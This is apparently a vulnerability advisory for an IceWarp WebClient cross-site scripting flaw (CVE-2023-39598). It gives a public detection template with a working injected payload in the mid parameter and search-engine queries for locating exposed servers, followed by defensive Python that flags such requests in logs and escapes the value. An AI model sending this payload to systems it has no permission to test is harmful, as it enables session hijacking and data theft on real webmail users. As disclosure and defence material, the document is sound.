CVE-2023-39598: IceWarp Email Client - Cross Site Scripting

Date: 2025-08-01 | Affected software: IceWarp Email Client | PoC: public

Vulnerability description

Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.

PoC code [public]

id: CVE-2023-39598

info:
  name: IceWarp Email Client - Cross Site Scripting
  author: Imjust0
  severity: medium
  description: |
    Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  reference:
    - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39598
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
    - https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39598
    cwe-id: CWE-79
    epss-score: 0.43484
    epss-percentile: 0.97435
    cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: icewarp
    product: webclient
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp"
    fofa-query: title="icewarp"
    google-query: intitle:"icewarp"
  tags: cve2023,cve,xss,icewarp

http:
  - method: GET
    path:
      - '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<img src=x onerror=confirm(document.domain)>"
          - "icewarp"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009f3a102c08d7c84f405b2ef67e6df1fc27ba64323bfafe509ecf604d496c3cb2022100d4ed805f7a9c802718f717f6bf6338a4dee3cc74e75433d1cadab4de3aa57281:922c64590222798bb761d5b6d8e72950
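The template above reflects a `mid` value containing markup back into the /webmail/ page. As an added example (not part of the page or of IceWarp's code), the following Python scans constructed web-server access-log lines for /webmail/ requests whose `mid` parameter carries HTML or event-handler markup, mirroring the template's matcher, and shows the server-side fix of HTML-encoding the value before reflecting it; log format, IPs and the `render_mid_safely` helper are assumptions.

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic). The path and the
# "mid" parameter mirror the request in the template above.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /webmail/?mid=abcd%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(document.domain)%3E HTTP/1.1" 200 5123
203.0.113.6 - - [01/Aug/2025:10:00:02 +0000] "GET /webmail/?mid=a1b2c3 HTTP/1.1" 200 5123
203.0.113.7 - - [01/Aug/2025:10:00:03 +0000] "GET /webmail/?mid=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5123
203.0.113.8 - - [01/Aug/2025:10:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 900
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters and tokens that never belong in a legitimate message id.
MARKUP_RE = re.compile(r'[<>"\']|on\w+\s*=|javascript:', re.IGNORECASE)


def suspicious_mid_requests(log_text):
    """Return (ip, decoded mid, status) for /webmail/ requests whose mid carries markup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith("/webmail/"):
            continue
        # parse_qs already percent-decodes once; a second unquote catches
        # double-encoded payloads such as %253C.
        for mid in parse_qs(parts.query, keep_blank_values=True).get("mid", []):
            decoded = unquote(mid)
            if MARKUP_RE.search(decoded):
                hits.append((m.group("ip"), decoded, int(m.group("status"))))
    return hits


def render_mid_safely(mid):
    """Hypothetical server-side fix: encode the value before reflecting it into an attribute."""
    return '<input name="mid" value="%s">' % escape(mid, quote=True)
```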